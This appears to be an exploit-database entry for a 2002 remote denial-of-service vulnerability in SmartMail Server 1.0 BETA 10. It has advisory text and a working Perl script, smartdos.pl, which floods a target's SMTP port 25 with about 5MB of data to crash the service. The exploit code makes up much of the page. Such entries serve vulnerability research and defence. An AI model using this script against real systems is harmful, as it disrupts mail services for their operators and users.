header-logo
Suggest Exploit
vendor:
SmartMail Server
by:
securma@caramail.com
7.5
CVSS
HIGH
Denial of Service
400
CWE
Product Name: SmartMail Server
Affected Version From: SmartMail Server 1.0 BETA 10
Affected Version To: SmartMail Server 1.0 BETA 10
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2002

SmartMail Server Remote Denial of Service Vulnerability

SmartMail Server is reported to be prone to a remote denial of service condition. It is possible to trigger this condition by sending large amounts (5MB+) of data to the server via TCP port 25 or 110. SmartMail Server will need to be restarted to regain normal functionality.

Mitigation:

Restart the server to regain normal functionality.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/6075/info

SmartMail Server is reported to be prone to a remote denial of service
condition. It is possible to trigger this condition by sending large amounts (5MB+) of data to the server via TCP port 25 or 110.

SmartMail Server will need to be restarted to regain normal functionality.

This issue was reported in SmartMail Server 1.0 BETA 10. It is not known if other versions are affected. 

#!/usr/bin/perl -w
# tool smartdos.pl
# securma@caramail.com
# Greetz: marocit and #crack.fr (specialement christal.)
#
use IO::Socket;
if ($#ARGV<0)
{
 print "\n write the target IP!\n\n";
 exit;
}
$buffer = "A"x 5099999 ;
$connect = IO::Socket::INET ->new (Proto=>"tcp",
PeerAddr=> "$ARGV[0]",
PeerPort=>"25"); unless ($connect) { die "cant connect $ARGV
[0]" }
print $connect "$buffer";
print "\nsending exploit......\n\n";